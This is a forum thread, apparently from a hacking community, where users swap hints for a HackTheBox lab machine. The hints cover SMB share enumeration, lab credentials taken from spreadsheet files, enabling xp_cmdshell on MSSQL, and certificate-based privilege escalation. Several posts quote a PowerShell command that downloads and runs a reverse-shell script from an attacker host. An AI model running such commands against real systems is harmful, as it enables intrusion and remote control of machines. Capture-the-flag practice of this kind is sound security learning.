Possibly Related Threads…

P34ckeR · Jan 11, 2025, 09:59 PM

(Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.

Unzip the accounts.xlsx file

unzip accounts.xlsx -d accounts_extracted

ffck · (This post was last modified: Jan 11, 2025, 10:03 PM by ffck.)

(Jan 11, 2025, 09:36 PM)VoidNull Wrote:
(Jan 11, 2025, 09:32 PM)LostGem Wrote:
(Jan 11, 2025, 09:28 PM)VoidNull Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Got any more tips for the xlsx files? Should they be found on the SMB share that are available?

smbmap -H 10.10.11.51 -u rose -p 'KxEPkKe6R8su'
IP: 10.10.11.51:445 Name: esc.htb Status: Authenticated Disk Permissions Comment

Accounting Department READ ONLY ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share Users READ ONLY
and then
smbclient //10.10.11.51/Accounting\ Department -U rose

will show the files

Oh my. Well of course. Forgot about the necessity of backslash in spaces. Thanks alot

where exactly we are looking ?

userhere123 · Jan 11, 2025, 10:08 PM

Kinda stuck at " mssqlclient.py" , any tip??

BlackBeer · Jan 11, 2025, 10:13 PM

(Jan 11, 2025, 09:59 PM)P34ckeR Wrote:
(Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.

Unzip the accounts.xlsx file

unzip accounts.xlsx -d accounts_extracted

Got it, that helped thank you.

maggi · (This post was last modified: Jan 11, 2025, 10:15 PM by maggi.)

(Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at " mssqlclient.py" , any tip??

enable xp cmdshell

use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'

find creds for user

WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!)

userhere123 · Jan 11, 2025, 10:42 PM

(Jan 11, 2025, 10:14 PM)maggi Wrote:
(Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at " mssqlclient.py" , any tip??

enable xp cmdshell

use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'

find creds for user

WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!)

Can't enable xp_cmdshell due to permission restrictions

StingEm · Jan 11, 2025, 10:42 PM

(Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.

For initial Foothold - once you log in as rose:
┌──(kali-admin㉿XXXPURPLEK)-[~/HTB/Escape2]
└─$ smbclient \\\\XX.XX.XX.XX/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024

6367231 blocks of size 4096. 888343 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (20.6 KiloBytes/sec) (average 20.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx '
getting file \accounting_2024.xlsx of size 10217 as ' (22.3 KiloBytes/sec) (average 21.6 KiloBytes/sec)

inside of those .xlsx you will find: [sharedStrings.xml]
<sst count="25" uniqueCount="24">
<si>
</si>
<si>
<t xml Confused

pace="preserve">Last Name</t>
</si>
<si>
<t xml Confused

pace="preserve">Email</t>
</si>
<si>
<t xml Confused

pace="preserve">Username</t>
</si>
<si>
<t xml Confused

pace="preserve">Password</t>
</si>
<si>
</si>
<si>
<t xml Confused

pace="preserve">Martin</t>
</si>
<si>
</si>
<si>
</si>
<si>
<t xml Confused

pace="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml Confused

pace="preserve">Oscar</t>
</si>
<si>
<t xml Confused

pace="preserve">Martinez</t>
</si>
<si>
<t xml Confused

pace="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xml Confused

pace="preserve">oscar</t>
</si>
<si>
<t xml Confused

pace="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml Confused

pace="preserve">Kevin</t>
</si>
<si>
<t xml Confused

pace="preserve">Malone</t>
</si>
<si>
</si>
<si>
<t xml Confused

pace="preserve">kevin</t>
</si>
<si>
</si>
<si>
<t xml Confused

pace="preserve">NULL</t>
</si>
<si>
<t xml Confused

pace="preserve">sa@sequel.htb</t>
</si>
<si>
<t xml Confused

pace="preserve">sa</t>
</si>
<si>
<t xml Confused

pace="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>

That should get you going - at least I hope that is what you were asking

Asdjkl01 · (This post was last modified: Jan 11, 2025, 10:45 PM by Asdjkl01.)

(Jan 11, 2025, 10:42 PM)userhere123 Wrote:
(Jan 11, 2025, 10:14 PM)maggi Wrote:
(Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at " mssqlclient.py" , any tip??

enable xp cmdshell

use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'

find creds for user

WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!)
Can't enable xp_cmdshell due to permission restrictions

You logged in as SA?

(Jan 11, 2025, 10:42 PM)StingEm Wrote:
(Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.

For initial Foothold - once you log in as rose:
┌──(kali-admin㉿XXXPURPLEK)-[~/HTB/Escape2]
└─$ smbclient \\\\XX.XX.XX.XX/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024

6367231 blocks of size 4096. 888343 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (20.6 KiloBytes/sec) (average 20.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx '
getting file \accounting_2024.xlsx of size 10217 as ' (22.3 KiloBytes/sec) (average 21.6 KiloBytes/sec)

inside of those .xlsx you will find: [sharedStrings.xml]
<sst count="25" uniqueCount="24">
<si>
</si>
<si>
<t xmlpace="preserve">Last Name</t>
</si>
<si>
<t xmlpace="preserve">Email</t>
</si>
<si>
<t xmlpace="preserve">Username</t>
</si>
<si>
<t xmlpace="preserve">Password</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">Martin</t>
</si>
<si>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xmlpace="preserve">Oscar</t>
</si>
<si>
<t xmlpace="preserve">Martinez</t>
</si>
<si>
<t xmlpace="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">oscar</t>
</si>
<si>
<t xmlpace="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xmlpace="preserve">Kevin</t>
</si>
<si>
<t xmlpace="preserve">Malone</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">kevin</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">NULL</t>
</si>
<si>
<t xmlpace="preserve">sa@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">sa</t>
</si>
<si>
<t xmlpace="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>

That should get you going - at least I hope that is what you were asking

Thanks for the response! I'm actually looking for Ryan's creds right now. I can't seem to find the config file that contains his password. Any help with process would be appreciated too! Like tools that were used to find Ryan's password and such, since that is what I'm stuck on.

arrogantoverlord · (This post was last modified: Jan 11, 2025, 10:50 PM by arrogantoverlord.)

could anyone help with privesc? for some reason it fails to request the cert, and it doesn't even come up as vulnerable (trying as ryan) Sad

userhere123 · Jan 11, 2025, 10:55 PM

(Jan 11, 2025, 10:43 PM)Asdjkl01 Wrote:
(Jan 11, 2025, 10:42 PM)userhere123 Wrote:
(Jan 11, 2025, 10:14 PM)maggi Wrote:
(Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at " mssqlclient.py" , any tip??

enable xp cmdshell

use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'

find creds for user

WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!)
Can't enable xp_cmdshell due to permission restrictions

You logged in as SA?

(Jan 11, 2025, 10:42 PM)StingEm Wrote:
(Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.

For initial Foothold - once you log in as rose:
┌──(kali-admin㉿XXXPURPLEK)-[~/HTB/Escape2]
└─$ smbclient \\\\XX.XX.XX.XX/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024

6367231 blocks of size 4096. 888343 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (20.6 KiloBytes/sec) (average 20.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx '
getting file \accounting_2024.xlsx of size 10217 as ' (22.3 KiloBytes/sec) (average 21.6 KiloBytes/sec)

inside of those .xlsx you will find: [sharedStrings.xml]
<sst count="25" uniqueCount="24">
<si>
</si>
<si>
<t xmlpace="preserve">Last Name</t>
</si>
<si>
<t xmlpace="preserve">Email</t>
</si>
<si>
<t xmlpace="preserve">Username</t>
</si>
<si>
<t xmlpace="preserve">Password</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">Martin</t>
</si>
<si>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xmlpace="preserve">Oscar</t>
</si>
<si>
<t xmlpace="preserve">Martinez</t>
</si>
<si>
<t xmlpace="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">oscar</t>
</si>
<si>
<t xmlpace="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xmlpace="preserve">Kevin</t>
</si>
<si>
<t xmlpace="preserve">Malone</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">kevin</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">NULL</t>
</si>
<si>
<t xmlpace="preserve">sa@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">sa</t>
</si>
<si>
<t xmlpace="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>

That should get you going - at least I hope that is what you were asking

Thanks for the response! I'm actually looking for Ryan's creds right now. I can't seem to find the config file that contains his password. Any help with process would be appreciated too! Like tools that were used to find Ryan's password and such, since that is what I'm stuck on.

as Oscar

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	106	10,147	1 hour ago Last Post: kkkreoifezrg
	JET fortress writeup + flags	ssrf	39	19,168	2 hours ago Last Post: vlxw
	[FREE] HackTheBox All Cheatsheets	Tamarisk	29	1,808	4 hours ago Last Post: mus1c0
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	52	4,441	7 hours ago Last Post: 0xdarkdharma
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	395	98,928	7 hours ago Last Post: 0xdarkdharma